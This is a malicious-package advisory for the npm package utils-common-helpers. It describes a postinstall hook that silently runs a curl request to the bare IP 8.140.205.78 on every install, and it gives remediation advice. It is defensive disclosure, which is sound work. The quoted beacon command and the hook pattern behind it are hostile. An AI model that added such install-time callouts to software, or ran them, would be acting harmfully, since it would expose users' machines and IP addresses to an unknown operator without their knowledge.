MAL-2026-5911

    Dashboard / Malicious Package / MAL-2026-5911

    MAL-2026-5911

    Published: 16 Jun 2026Last Modified: 21 Aug 2026Aliases: 
    GHSA-fq4g-5xjj-r935

    Summary: Malicious code in utils-common-helpers (npm)

    Details: Source: amazon-inspector (e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584) package.json declares a postinstall lifecycle hook that runs `curl -s http://8.140.205.78 -o /dev/null` on every install. The package's only functional code is a trivial `hello()` helper in index.js that returns the string 'hello', which is inconsistent with the declared purpose of 'Common utility helpers for frontend projects'. The lifecycle network call has no relation to any advertised functionality and serves only to disclose the installer's public IP address and install timing to the operator of the bare IP 8.140.205.78. This is a classic install-counter / victim-discovery beacon pattern: a throwaway lure package whose real purpose is the install-time callout. Plain HTTP to a bare IP (no TLS, no domain, no documented purpose) is inconsistent with any legitimate telemetry shape. Source: ghsa-malware (5d7c362bd8c9dbbe6e906877925eb6bd5d2facdacd7decdd16c59bea3dec7762) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: utils-common-helpers

    Purl: pkg:npm/utils-common-helpers

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.0
    MAL-2026-5911 | CVE-DB